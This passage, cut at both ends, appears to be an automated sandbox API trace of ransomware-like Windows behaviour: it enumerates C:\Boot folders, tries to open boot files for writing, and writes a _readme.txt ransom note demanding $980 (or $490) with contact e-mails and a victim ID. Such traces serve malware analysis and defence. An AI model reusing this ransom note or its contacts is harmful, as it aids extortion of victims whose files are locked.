"c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.626] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0188.626] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0188.626] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0188.626] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.626] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0188.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.626] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0188.627] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.627] PathFindFileNameW (pszPath="") returned="" [0188.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.627] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0188.627] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0188.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0188.627] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0188.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0188.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.628] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0188.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81c) returned 0x2e765d0 [0188.629] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0188.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.629] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 0 [0188.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0188.629] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0188.629] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0188.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0188.630] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\_readme.txt" (normalized: "c:\\boot\\tr-tr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0188.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0188.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.631] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*" (normalized: "c:\\boot\\tr-tr\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.631] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.631] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0188.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.631] PathFindExtensionW (pszPath="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned=".mui" [0188.631] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.632] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0188.632] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0188.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0188.633] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0188.633] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.644] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.644] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.644] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.651] HeapFree (in: hHeap=0x620000, 